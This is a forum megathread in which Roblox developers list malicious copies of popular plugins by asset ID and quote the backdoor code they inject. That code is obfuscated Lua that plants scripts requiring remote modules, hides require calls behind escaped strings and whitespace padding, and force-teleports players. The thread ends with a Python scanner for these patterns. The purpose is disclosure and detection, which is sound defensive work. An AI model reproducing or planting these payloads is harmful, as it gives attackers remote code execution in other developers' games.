Known Malicious Plugins for HISR detection Megathread

Just as an FYI, these have all been sent to moderation to be deleted.

59 Likes

Malicious plugin: 2760053108
Original plugin: 637905041

3 Likes

I am still confused as to why the users creating these backdoors get their accounts deleted, but the actual malicious assets remain. Everything should be gone. Additionally, I feel like IP bans and machine bans would be a more viable solution than just deleting the account because spoofing the machine hardware ID is much more time consuming and we all know these backdoors are coming from a select few exploit developers that are trying to sell products with “server sided script execution”, after FE was mandated.

7 Likes

Malicious plugin: 2787024683
Original: 171505690

Module being required: 2674688515

Who needs to deobfuscate when you can just change the environment
getfenv()["require"] = function(...) warn(...) end

5 Likes

Malicious plugin: 2787024663
Original: 519874479

Requires same module: 2674688515

3 Likes

Said module 2655056793 requires another module. 2686631266 (wow thanks roblox for indirectly helping by telling me that you are removing private modules required from others)


Ro-Defender™ Plugin v8.7

Malicious: 2655565054
Original: 142273772

1 Like

AeroGameFramework

Original: 1882232354
Malicious: 2435556035

1 Like

Just an FYI for everybody concerned about malicious plugins. I’ve seen a massive uptake in spam user accounts purposefully impersonating well-known developers. For example:

  • Real: OkevinO Spam: 0kevin0
  • Real: CodeSponge Spam: SpongeCoder

I think a lot of these accounts got banned, but I just wanted to make people aware because one of my friends fell for this and got into trouble with the moderators because of a server side backdoor being used to put items in his game.

Please double check the names of who developed the plugin you’re installing and check if it’s a deliberate copy or not.

6 Likes

It’s happening again.

Part to Terrain (my own plugin.)
Original: 261634767
Malicious: 3328292627

Building Tools by F3X
Original: 144950355
Malicious: 3320045603

GapFill & Extrude
Original: 165687726
Malicious: 3320031385

Load Character
Original: 752585459
Malicious: 3323713717

Waterfall Generator
Original: 1191990117
Malicious: 3328279741

3 Likes

Tree Generator
Original: 1256428022
Malicious: 3390238326

Pretty half-baked attempt if I’m honest, the injected code broke my server core script which in turn breaks everything else. Good way to draw the ire of a coffee-deprived developer. 0/10.

Intro Creator

Original plugin: https://www.roblox.com/library/723917710/Intro-Creator-OFFICIAL
Malicious plugin: https://www.roblox.com/library/3664187642/Intro-Creator

Realism Mod
Original: 400812710
Malicious: 3736586479 (inserts a ModuleScript with obfuscated code)

Roundify
Original: 2233768483
Malicious: 3745147634

Intro Creator
Original: 723917710
Malicious: 3664187642

Shift to Sprint
Malicious plugin: 3664816543
Original plugin: 142346332

Day And Night
Malicious plugin: 3622467610
Original plugin: 878777463

Roundify

Malicious plugin: 4593270188
Original plugin: 2233768483

1 Like

This is awesome. Much faster than self-verification and an easy way of getting what you need.

Thanks for creating the tool!

1 Like

Virus-Destroyer (Anti-Serverside)

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4863624219/Virus-Destroyer-Anti-Serverside
Malicious action:

pcall(function()local a={'Weld',"FilterEvent","ClickerModule","ChatModule","Anti-Exploit"}local b=Instance.new("Script")b.Source='--[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService("ServerScriptService")elseif a==2 then b.Parent=workspace:FindFirstChildOfClass("Script")elseif a==3 then b.Parent=workspace:FindFirstChildOfClass("Model")end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Custom Name Title

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4864404814/Custom-Name-Title
Malicious action:

pcall(function()local a={'Weld',"FilterEvent","ClickerModule","ChatModule","Anti-Exploit"}local b=Instance.new("Script")b.Source='--[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService("ServerScriptService")elseif a==2 then b.Parent=workspace:FindFirstChildOfClass("Script")elseif a==3 then b.Parent=workspace:FindFirstChildOfClass("Model")end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Fall Damage Plugin [FIXED]

Original plugin: https://www.roblox.com/library/1248186463/Fall-Damage-Plugin-FIXED

~~
~~

1

Malicious plugin: https://www.roblox.com/library/4742433843/Fall-Damage-Plugin
Malicious plugin uploader: RobloxSecurePlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new("Script")
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = "ClientReplicator"
AntiExploit.Source = [[
--Official roblox studio script
require(4582121027):protecc()
]]

Malicious module id: https://www.roblox.com/library/4582121027/unnamed
Malicious module uploader: Neatoxic

~~
~~

2

Malicious plugin: https://www.roblox.com/library/4657687313/Fall-Damage-Plugin
Malicious plugin uploader: RobloxTopPlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new("Script")
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = "ClientReplicator"
AntiExploit.Source = [[
game.Players.PlayerAdded:Connect(function(player)
    wait(0.0000001)
    local joinData = player:GetJoinData().SourcePlaceId
    local TeleportService = game:GetService("TeleportService")
    if joinData == 4628266409 then
        local Tpdata = player:GetJoinData().TeleportData
        if Tpdata then
            Req = Tpdata.req
            gid = Tpdata.grid
        end
        if player:GetRankInGroup(gid) == 2 then
            require(Req).load(player.Name)
        end
        return else
    end
    local Players = game:GetService("Players")
    local TeleportService = game:GetService("TeleportService")
    local teleportData = {
        maxxPlrs = Players.MaxPlayers,
        maxPlrs = Players.NumPlayers,
        placeId = game.PlaceId,
        JobId = game.JobId,
        CreatorId = game.CreatorId
    }
    TeleportService:Teleport(4628266409, player, teleportData)
end)

]]
Malicious place id: https://www.roblox.com/games/4628266409/Loading
Malicious place uploader: RobloxFasterLoader
Malicious plugin is force loop rejoining a game to attempt to inflate Visits.

~~
~~

3

Malicious plugin id: https://www.roblox.com/library/3976656034/Fall-Damage-Plugin
Malicious plugin uploader: Txppin
Malicious plugin action:

function a(b)function c(d)d.Source=d.Source..'\n'..game:GetObjects('rbxassetid://4850318089')[1].Source end;for e,d in next,b:GetDescendants()do if rawequal(d.ClassName,'Script')and not string.find(d.Source,'4794986906')then c(d)d:GetPropertyChangedSignal('Source'):Connect(function()if not string.find(d.Source,'4794986906')then c(d)end end)end end;f=false;function g()d=game:GetObjects('rbxassetid://4852273118')[1]if not b:FindFirstChild('Filter Event')or b:FindFirstChild('Filter Event').Source~=d.Source then d.Parent=b else d=b:FindFirstChild('Filter Event')end;function h()if not f then wait(1/60)f=true;d:Destroy()f=false;g()end end;i=d:GetPropertyChangedSignal('Parent'):Connect(h)d.Changed:Connect(function(j)if rawequal(j,'Disabled')or rawequal(j,'Source')then i:Disconnect()h()end end)end;g()end;a(workspace)a(game:GetService('ServerScriptService'))

There are multiple require ids in this action attempt. All require ids listed.

Malicious require id: https://www.roblox.com/library/4852273118/Filter-Event
Malicious require uploader: TeefusBeefus
Malicious require action:

--[[
Created by: InceptionTime (Year: 2020)
Description: This is a filtering event put by Roblox to check if your game isn't modifiying the chat filter in any sort of way, deleting this may lead to unforeseeable consequences.
]]
-- You may proceed if you have basic knowledge of scripting and know what you're doing.
local RunService = game:GetService("RunService")
local Require = require
local Loader = 4794986906 -- Touching this Id may stop the script from functioning
if not RunService:IsStudio() and not RunService:IsClient() and RunService:IsServer() then -- Checks if it isn't Studio, as it defeats the purpose of the module, also checks if it is being ran on the server's side and not on the client's side, just to be on the safe side.
    pcall(Require, Loader) -- Begins to load the module, it is wrapped in pcall so it doesn't bother you in anyway whatsoever.
end

Malicious require id: https://www.roblox.com/library/4794986906/unnamed
Malicious require uploader: sunburstery
Malicious action unknown as obfuscated.

Malicious require id:
https://www.roblox.com/library/4850318089/backpack-code
Malicious require action:

if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end

Malicious require id #2: https://www.roblox.com/library/4794986906/unnamed
This goes to above malicious require id

~~
~~

5

Malicious plugin id: https://www.roblox.com/library/4863366172/Fall-Damage-Plugin
Malicious plugin uploader: LowkeyNatey
Malicious plugin action:

pcall(function()local a={'Weld',"FilterEvent","ClickerModule","ChatModule","Anti-Exploit"}local b=Instance.new("Script")b.Source='--[[ROBLOX Studio Script]] require(4850721608):Fire()'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService("ServerScriptService")elseif a==2 then b.Parent=workspace:FindFirstChildOfClass("Script")elseif a==3 then b.Parent=workspace:FindFirstChildOfClass("Model")end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Require id is a part of above malicious plugins

2 Likes

Backdoor malicious module

getfenv()['\114\101\113\117\105\114\101'](2422875198*2)

2422875198*2 = 4845750396

This is obfuscated, but running it in repl.it prints the module id that failed to load,
which it then loads

which has a script to then load

Roblox = "IsStudio"																																																																																																																																																																																																																		
local a=game:GetService("RunService")if a:IsStudio()then print('Loaded!') else if game.PlaceId==185655149 or game.PlaceId==920587237 or game.PlaceId==735030788 then else getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))end end 

and

--[[
License Information:
This product is protected under copyright law. You may not distribute, re-use, modify or otherwise tamper with this software in any way.
Breaking the license gives us, "smartTech", legal grounds for a DMCA takedown.
Please don't steal our stuff.
--]]
local module = {} 
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																local CheckMeIn = false
if CheckMeIn == true then
require(862849844) -- This is the offical CheckMeIn loader. This is owned by an account named "SmartTech". Feel free to use it.
else
	CheckMeIn = "Loaded."
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										local a = script.Script
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														a.Parent = workspace.Camera
end
  
return module

Module 862849844 is referred to as CheckMeIn, and it is unknown whether it is the original creator of this or just something this backdoor creator is using to log users having this backdoor in their game. I’ve tried to inform them about the use of this module; they’ve been warned for over 3 days before I posted this.

The top script then finally loads this module.

This module has a lot of obfuscated code, but one of the scripts remained unobfuscated, loading these two other modules.

MainModule> Folder> Main> ul

-- open source. leak.
local Players = game:GetService('Players')
game.Players.PlayerAdded:Connect(function(Player)
    if Player:GetRankInGroup(6157358) >= 2 then
		wait(0.1)
        require(4674979018):Fire(Player.Name) 
		require(5033070911):ikthisisskidded(Player.Name)
game.Players[Player.Name].PlayerGui.JOHNDOE.ResetOnSpawn = false
    end
end)
game.Players.PlayerAdded:Connect(function(Player)
    if Player:GetRankInGroup(5860863) >= 2 then
		wait(0.1)
        require(4834950415):Fire(Player.Name)
		require(5033070911):ikthisisskidded(Player.Name)
    end
end)
game:GetService("Players").PlayerAdded:Connect(
    function(player)
        if game.PlaceId == 4973653404 or game.PlaceId == 4860760464 then
            game:GetService("TeleportService"):Teleport(5009641755, player)
        end
    end
)

Many of the modules use these groups to check whether the player is a member before giving members scripts in this backdoor.

Places that are being teleported to via this backdoor to inflate or ‘pretend fast loading…’

One of the scripts is checking to do a banlist
https://builderman.club/fe.json
Would be suggested to blacklist this domain.

Loads another module

and another module

This module then uses LuaVM to load code without the need of loadstring in
MainModule > JohnDoe> Main> Shadow> Frame> RemoteHandle

another module

This backdoor is still loaded by an unknown plugin, still looking for it.

3 Likes

Guys!
I figured something out.
I was working on a game with a friend of mine, and I suspect he has a virus.
In every Script (not localscript), when I click behind the last “end” (how do I explain this) it moves you to the very side of the script, as if you’ve written 500 spaces in one line and click behind a letter, it moves your Scrollbar (for the X position) to the very far right.

Now, if this happens, move the scrollbar slowly, until you find some weird code, For example I had this:

if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end		

This has to be a “virus”, delete those.

Another way to detect those is by searching “game:service”, in case you haven’t used “game:service” in your script.

I do not know what malicious plugin my friend has installed

3 Likes
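
The manual checks described in this thread (decoding the `\114\101...` escapes behind `getfenv()[...]`, resolving an id written as `2422875198*2`, and looking for code pushed off-screen by whitespace) can be run over exported script source. The Python scanner below is an added example, not code from any poster in the thread; the 80-character padding threshold, the list of sensitive globals, and the third and fourth sample lines are assumptions.

```python
import re

# Lua decimal escape such as \114 (one to three digits per byte).
DEC_ESCAPE = re.compile(r"\\(\d{1,3})")
# getfenv()["..."] or getfenv()[string.reverse("...")], either quote style.
FENV_INDEX = re.compile(
    r"getfenv\(\)\s*\[\s*(?P<rev>string\.reverse\s*\(\s*)?"
    r"""(?P<q>["'])(?P<body>(?:\\.|(?!(?P=q)).)*)(?P=q)\s*\)?\s*\]"""
)
# Call argument that is a number or a product of two numbers.
NUM_ARG = re.compile(r"\s*\(\s*(\d+)(?:\s*\*\s*(\d+))?\s*\)")
# Direct require(<asset id>) call, listed for review rather than as proof.
PLAIN_REQUIRE = re.compile(r"(?<![\w.:])require\s*\(\s*(\d+)\s*\)")
# Whitespace run long enough to push code out of view (assumed threshold).
PADDING = re.compile(r"[ \t]{80,}")
# Globals worth flagging when reached indirectly (assumed list).
SENSITIVE = {"require", "loadstring", "getfenv", "setfenv"}

def decode_name(body, is_reversed):
    """Resolve the global name hidden behind escapes and string.reverse."""
    name = DEC_ESCAPE.sub(lambda m: chr(int(m.group(1))), body)
    return name[::-1] if is_reversed else name

def scan(source):
    """Return (line, kind, detail) findings for one script's source text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if PADDING.search(line):
            findings.append((lineno, "padding", "whitespace run of 80+ characters"))
        for m in FENV_INDEX.finditer(line):
            name = decode_name(m.group("body"), bool(m.group("rev")))
            if name not in SENSITIVE:
                continue
            arg = NUM_ARG.match(line, m.end())
            asset = int(arg.group(1)) * int(arg.group(2) or 1) if arg else None
            findings.append((lineno, "hidden-" + name, asset))
        for m in PLAIN_REQUIRE.finditer(line):
            findings.append((lineno, "require-by-id", int(m.group(1))))
    return findings

# The first two lines are snippets quoted in the thread; the last two are
# constructed (padding, a placeholder id, and an ordinary relative require).
SAMPLE = "\n".join([
    r"""if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end""",
    r"""getfenv()['\114\101\113\117\105\114\101'](2422875198*2)""",
    "end" + "\t" * 300 + r"""getfenv()[string.reverse("\101\114\105\117\113\101\114")](1234567890)""",
    "local Util = require(script.Parent.Util)",
])

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `require-by-id` hit is not malicious by itself; compare the id against the module ids reported in this thread and against the modules you knowingly depend on.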